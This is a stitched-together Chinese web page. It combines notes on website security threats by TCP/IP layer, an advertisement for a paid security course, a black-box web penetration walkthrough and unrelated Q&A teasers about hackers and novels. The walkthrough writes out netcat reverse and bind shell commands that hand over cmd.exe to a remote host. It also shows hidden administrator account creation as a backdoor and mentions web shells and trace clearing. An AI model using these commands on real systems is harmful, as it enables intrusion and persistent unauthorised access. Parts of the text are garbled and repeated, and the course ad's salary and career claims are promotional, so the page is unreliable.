*** 安全是一个统称,范围很大。从字面意思上来讲,凡是涉及到 *** 的安全都属于 *** 安全,以TCP/IP四层 *** 模型为例,从底层的硬件到顶层的应用,无论是硬件还是软件都属于 *** 安全的范围,Web安全就是 *** 安全的一部分。Web安全与 *** 安全不同,它主要就是指应用层面上,比如:Web应用、Web平台、网站等。
网站安全
§1、网站安全概述
一、 常见的网站提供的服务:DNS SERVER,WEB SERVER,E-MAIL SERVER,FTP SERVER,此外网站还需要有个主服务器(更好不要把网站的操作系统服务器与上述的SERVER 放在一起)(不一定全对互联网开放)
1、 这些常见的服务属于TCP/IP协议栈,如果低层安全性被攻击了,则高层安全成了空中楼阁。所以要进行安全分析(安全只是个动态的状态)
2、 TCP/IP协议栈各层常见的攻击(回忆TCP/IP各层结构图)
(1)物理层:数据通过线传输是特点
威胁:监听网线,sniffer软件进行抓包,拓朴结构被电磁扫描攻破
保护:加密,流量填充等
(2)internet层:提供寻址功能是其特点-----路由,IP,ICMP,ARP,RARP
威胁:IP欺骗(工具完成将数据包源地址IP改变)
保护:补丁、防火墙、边界路由器设定
(3)传输层:控制主机间的信息流量-----TCP,UDP
威胁:DOS(图),DDOS,会话劫持等
保护:补丁、防火墙、开启操作系统抗DDOS攻击特性
(4)应用层:协议最多最难防
① *** TP协议:
威胁:邮件风暴(黑客给邮件服务器不断发木马或病毒),企业用户内网与外网采用同样的邮箱名,邮件的中继与转发(图)
保护:防病毒网关,邮件服务器软件及时打补丁
②FTP协议:
威胁:匿名用户如果具有写权限,会上传非法服务给FTP SERVER; 用户名、口令在FTP客户端与服务器端之间是明文传输
保护:FTP数据存放于独立分区,不允许匿名的FTP连接,上传与下载位于不同的NTFS分区,FTP客户端与服务器端的通讯进行加密SSH
③HTTP协议:
威胁:Java script,CGI,ASP,ActiveX
保护:禁止这些不安全的控件,杀毒软件
④Telnet协议:
威胁:明文传输敏感数据
保护:加密
⑤SNMP协议:
威胁:public默认社区名,明文传输敏感信息
保护:将默认社区名改名,防火墙
⑥DNS协议:
威胁:DNS欺骗
保护:防火墙阻止,在DNS zone中设定成只允许几个主机的zone传输
3、 网站业务流(电子商务与普通企业网站业务流不同,重点是认证)、采用的拓朴、防火墙体系结构、操作系统等的不同,受到的威胁也不同
二、 在网站业务流、采用的拓朴、防火墙体系结构、操作系统等体系结构确定的前提下,还存在的安全问题
1、未授权存取(匿名用户具有写权限----IIS写权限扫描工具+桂林老兵可以完成)
2、窃取系统信息:帐号,银行
3、破坏系统:破坏数据(删除数据)
4、非法使用:利用FTP服务器存放非法软件
5、病毒木马:不小心执行病毒、木马
三、web站点典型安全漏洞
1、操作系统类:通用安全漏洞,各操作系统特有的安全漏洞
2、路由器等 *** 系统漏洞:如路由器、防火墙等的缺省配置及配置错误(一部分边界路由器有自动配置的功能,但这种自动配置功能必须手工开启)(见校园网拓朴结构图)
3、应用系统安全漏洞:协议漏洞
4、 *** 安全防护系统不健全:缺乏安全意识,缺少定期的安全检测、安全监控
5、其它漏洞:易被欺骗,弱认证,对电邮队服附件病毒及WEB浏览可能存在的恶意java/ActiveX小控件进行有效控制。
正因为存在这些安全漏洞所以要制定安全策略。
§2、WEB站点安全策略
允许远程执行CGI脚本,脚本中的bug会成为保护操作系统的漏洞;但如果限制CGI限制得过头了,web使用起来不方便(安全是使用方便与安全配置之间的一个平衡点)
一、 安全策略定制原则:
1、风险分析:搞清站点属于低端安全、中端安全、还是高端安全?易受哪些威胁?(默认配置)?根据威胁进行安全评估(使用启明星辰的工具)
2、服务器记录原则:web服务器会记录它们收到的每一次连接(如果web server采用认证的方式还会记录下用户名),该用户在此期间填写的表格会被记录下来,会对用户构成威胁。
解决方案:web服务器管理者可以查阅用户资料,但无需打开(审计人员查管理员好些)
二、 配置web server的安全特性
1、用户与站点建立连接的过程中可能会造成因域名欺骗而使得用户得不到授权访问及要求的信息或者把黑客当作合法用户来允许其访问
2、加强各服务器的措施
①web server:主分区存放操作系统,web server放至另一分区;CGI脚本放至第三个NTFS分区;不以administrator身份运行web server(而以另一用户身份运行web server)其余见winnt站点解决方案
②ftp server:与web server不同分区,允许只读访问,进行访问控制的设置(一般只对内网开放)
③电子邮件服务器:安装 *** 级电子邮件扫描软件;禁掉中继任何未授权用户;设置垃圾邮件过滤及巨型邮件过滤条件
三、 排除站点中的安全漏洞,尽量减少安全漏洞
1、物理漏洞:未授权人员访问引起的
2、软件漏洞:由软件应用程序的错误授权引起。首要规则----不轻易相信脚本、java applet
3、不兼容问题
4、缺乏安全策略
四、 监视控制出入web站点的出入情况
1、 Webtrends:查访问次数最多的站点、最频繁的用户。它可以完成监控请求(如:sever访问次数,用户来自何处,服务器上哪类信息被访问、访问的浏览器类型、用户提交方式等);它可以测算命中次数(可以确定出站点的命中次数----一个用户详细地读站点时一次简单的会话可以形成几次命中;还可以通过站点上某个文件的访问次数来确定站点访问者的数目)
2、 入侵检测系统:免费的snort
3、 传输更新:web三元素----HTTP协议,数据格式HTML,浏览器。三元素以HTML为中心,必须保持其更新
黑客其实就o黑客其实就是一个电脑高手他可以在黑客其实就是一个电脑高手,他可以在 *** 上任意的破除你的密码和商业机密。所以人们把这黑客其实就是一个电脑高手,他可以在 *** 上任意的破除你的密码和商业机密。所以人们把这个电脑幕后的高手叫做黑客。
类似一个守 一个攻的关系。。或者警察与小偷的关系。。
*** 安全是一个统称,是一个很大的范围。字面意义上来说,凡是涉及到 *** 的安全都属于 *** 安全。以TCP/IP四层 *** 模型为例,从底层的硬件到顶层的应用,不论是硬件还是软件来说都属于 *** 安全的范围。而web安全主要就是指应用层面上,我们平时使用的web应用、web平台、网站等。
黑客攻防利用网站操作系统的漏洞和Web服务程序的SQL注入漏洞等得到Web服务器的控制权限,轻则篡改网页内容,重则窃取重要内部数据,更为严重的则是在网页中植入恶意代码,使得网站访问者受到侵害。这也使得越来越多的用户关注应用层的安全问题,对Web应用安全的关注度也逐渐升温。
IT行业那么多方向为什么选择 *** 安全
理由一:对年龄无限制,像老中医一样越老越吃香,在IT行业很多岗位年龄上了30岁是没有企业愿意接收的,一个是不好管理,一个是技能容易复制年龄大没有优势;唯有 *** 安全安全靠的是解决问题的能力。
理由二:容易入门,对英语和数学要求不高,简单的英文通过翻译器就可以搞定,更不用涉及到微积分,函数,矩阵等非常难得数学问题,会熟练操作电脑即可
理由三: *** 安全是IT行业唯一不看重学历之一,很多从事安全共工作的年龄并不是很大,学历也很低,大学里面开设 *** 安全得专业少之又少,很多人到企业才接触到安全,才知道 *** 安全得重要性,市场需求大,招人难,所以从业人员普遍学历低。
理由四:薪资高: *** 安全的薪资比同等学历的开发薪资要高,更容易入门,北上广深杭平均薪水12000起步。
理由五:升职快:安全工作对接得一般是企业领导人和部门高管,更容易获得领导得认可,开发程序有问题最多是一个bug,但是安全只要有问题,不仅仅是业务方面得损失,更多的是企业会承担法律责任。
理由六:对个人应急处理问题的能力有很大的帮助:例如网站出现不安全警告需要及时处理及时响应及预防
*** 安全是个很好的方向,17年国家才立法,现在市场上特别缺这方面的人才,IT互联网发展这么快,还有手机移动互联网的发展,都催生了 *** 安全和信息安全,我们的各种网站和app时时刻刻面临着信息被窃取,篡改,泄密,欺诈等一些列不安全的因素,甚至威胁到国家安全,所以这门学科是很好的学科,我们这边毕业的学生,完全可以满足企业用人的需求,出来工资基本大偶在14000左右的。
帮助有志向的年轻人通过自己的努力过上体面的生活,把企业的生产案例搬到课堂里面来讲了,课程涵盖 *** 安全核心基础、web渗透测试及源码审计、等级保护、风险评估、app渗透,内网渗透,过狗,逆向工程、安全巡检、应急响应,全实操案例,可以满足你学习的需求;
Web渗透测试分为白盒测试和黑盒测试,白盒测试是指目标网站的源码等信息的情况下对其渗透,相当于代码分析审计。而黑盒测试则是在对该网站系统信息不知情的情况下渗透,以下所说的Web渗透就是黑盒渗透。
Web渗透分为以下几个步骤,信息收集,漏洞扫描,漏洞利用,提权,内网渗透,留后门,清理痕迹。一般的渗透思路就是看是否有注入漏洞,然后注入得到后台管理员账号密码,登录后台,上传小马,再通过小马上传大马,提权,内网转发,进行内网渗透,扫描内网c段存活主机及开放端口,看其主机有无可利用漏洞(nessus)端口(nmap)对应服务及可能存在的漏洞,对其利用(msf)拿下内网,留下后门,清理痕迹。或者看是否有上传文件的地方,上传一句话木马,再用菜刀链接,拿到数据库并可执行cmd命令,可继续上大马.........思路很多,很多时候成不成功可能就是一个思路的问题,技术可以不高,思路一定得骚。
信息收集
信息收集是整个流程的重中之重,前期信息收集的越多,Web渗透的成功率就越高。
DNS域名信息:通过url获取其真实ip,子域名(Layer子域名爆破机),旁站(K8旁站,御剑1.5),c段,网站负责人及其信息(whois查询)
整站信息:服务器操作系统、服务器类型及版本(Apache/Nginx/Tomcat/IIS)、数据库类型(Mysql/Oracle/Accees/Mqlserver)、脚本类型(php/jsp/asp/aspx)、CMS类型;
网站常见搭配为:
ASP和ASPX:ACCESS、SQLServer
PHP:MySQL、PostgreSQL
*** P:Oracle、MySQL
敏感目录信息(御剑,dirbust)
开放端口信息(nmp)
漏洞扫描
利用AWVS,AppScan,OWASP-ZAP,等可对网站进行网站漏洞的初步扫描,看其是否有可利用漏洞。
常见漏洞:
SQL注入
XSS跨站脚本
CSRF跨站请求伪造
XXE(XML外部实体注入)漏洞
SSRF(服务端请求伪造)漏洞
文件包含漏洞
文件上传漏洞
文件解析漏洞
远程代码执行漏洞
CORS跨域资源共享漏洞
越权访问漏洞
目录遍历漏洞和任意文件读取/下载漏洞
漏洞利用
用工具也好什么也好对相应漏洞进行利用
如:
Sql注入(sqlmap)
XSS(BEEF)
后台密码爆破(burp)
端 *** 破(hydra)
提权
获得shell之后我们权限可能很低,因此要对自己提权,可以根据服务器版本对应的exp进行提权,对于Windows系统也可看其补丁对应漏洞的exp进行提权
内网渗透
首先进行端口转发可用nc
nc使用 *** :
反向连接
在公网主机上进行监听:
nc-lvp 4444
在内网主机上执行:
nc-e cmd.exe 公网主机ip4444
成功之后即可得到一个内网主机shell
正向连接
远程主机上执行:
nc-l -p 4444 -t -e cmd.exe
本地主机上执行:
nc-vv 远程主机ip4444
成功后,本地主机即可远程主机的一个shell
然后就是对内网进行渗透了,可以用主机漏洞扫描工具(nessus,x-scan等)进行扫描看是否有可用漏洞,可用msf进行利用,或者用nmap扫描存活主机及开放端口,可用hydra进行端 *** 破或者用msf对端口对应漏洞得到shell拿下内网留后门
留后门
对于网站上传一句话木马,留下后门
对于windows用户可用hideadmin创建一个超级隐藏账户
手工:
netuser test$ 123456 /add
netlocalgroup administrators test$ /add
这样的话在cmd命令中看不到,但在控制面板可以看到,还需要改注册表才能实现控制版面也看不到,太过麻烦,不多赘述,所以还是用工具省心省力。
一个人的微信用黑头像是什么意思? 1、也比较怀旧。全黑头像代表一种神秘的气质,让自己不显眼,从而隐藏在人群中。这类人一般喜欢安静,社交不好,做事很有原则。讨厌被别人知道,喜欢独处在自己的小世界里。2、...
郭盛华世界黑客排名 郭盛华在世界十大黑客中排名第六位,他是中国黑客界的传奇人物,也是一个不折不扣的爱国青年。2007年是中国黑客群雄争霸的年代,16岁的他创办华盟(现东方联盟),成为中国最年轻的黑客教...
关于黑客的三种类型:白帽,灰帽,黑帽 白帽黑客:一般来说,白帽是指安全研究人员或者从事网络和计算机技术防御的人员。在发现软件漏洞后,他们通常会将这些漏洞报告给供应商,以便供应商可以立即发布漏洞补丁。白...
全球最为严重的黑客入侵事件有哪几起? 世界上自从电脑普及之后,就发生了很多黑客入侵的事件,下面介绍几种危害比较大,范围传播比较广的病毒。一、“梅利莎病毒”事件1998年,大卫L史密斯运用Word软件里...
谁介绍几本有关黑客的小说! 1、疯狂的硬盘2、重生之数字生命3、天擎4、超脑黑客5、禁区之门6、原始动力7、黑客江湖8、网络骑士9、黑客的心10、黑客风云11、超级电脑12、数字生命13、白手起家14...
女主凉喻男主陆故新的小说 陆故新凉喻的小说是《以你为名的温柔》。主角叫凉喻陆故新的小说叫《以你为名的温柔》,是作者红乐写的一本现代言情类型的小说,情节引人入胜,主要讲的是:夏城曾有段豪门秘闻被人当茶余...